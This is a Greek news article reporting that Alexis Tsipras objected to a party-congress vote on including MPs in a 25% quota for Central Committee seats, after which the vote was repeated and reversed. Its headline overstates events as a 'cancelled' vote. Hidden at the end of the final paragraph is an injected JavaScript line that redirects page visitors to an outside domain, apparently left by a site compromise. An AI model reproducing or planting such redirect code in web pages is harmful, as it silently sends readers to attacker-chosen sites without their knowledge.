Απίθανο: Ο Τσίπρας ακύρωσε ψηφοφορία, γιατί δεν του άρεσε το αποτέλεσμα

0
30

 

«Αν καταλαβαίνετε τι ψηφίζετε καλώς. Αλλά αν δεν καταλαβαίνετε, τότε υπάρχει θέμα γιατί ψηφίσατε ενάντια στην εισήγησή μου», είπε ο Αλέξης Τσίπρας λίγες ώρες πριν την τελική ψηφοφορία και ξεσήκωσε τους συνέδρους.
Ο πρωθυπουργός εξέφρασε την ενόχλησή του για την ψηφοφορία η οποία επικύρωνε, αντίθετα από την πρότασή του, την πρόταση να συμπεριλαμβάνονται οι βουλευτές στην ποσόστωση 25% με την οποία 37 θέσεις από τις 151 της ΚΕ προορίζονται για κυβερνητικά στελέχη.

Άμεση ήταν η αντίδραση του Δημήτρη Βίτσα ο οποίος ανέφερε πως δεν μπορεί να λαμβάνονται αποφάσεις για ζητήματα του καταστατικού σε συνέδριο που δεν είναι καταστατικό.

Λίγο αργότερα ο Αλέξης Τσίπρας προφανώς συνειδητοποιώντας το κλίμα που διαμορφωνόταν επανήλθε στο βήμα και τόνισε πως το κόμμα είναι κυρίαρχο σώμα και δικαιούται ακόμη και να κάνει λάθος. «Δε ζήτησα να παρθεί πίσω μια απόφαση, αλλά το προεδρείο να ξαναβάλει το ζήτημα με την προβλεπόμενη διαδικασία (δύο εισηγητές από την κάθε πλευρά) λόγω της σοβαρότητας ενός ζητήματος που είναι πέραν της αρμοδιότητος του συνεδρίου (καθότι τακτικό και όχι καταστατικό). Ένα λάθος δε διορθώνεται με άλλο λάθος», επισήμανε.

Τελικά κατά την επανάληψη της ψηφοφορίας υπερψηφίστηκε με μεγάλη πλειοψηφία η αρχική εισήγηση, οι βουλευτές να μην συμπεριλαμβάνονται στην ποσόστωση, όπως προβλέπει το καταστατικό. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here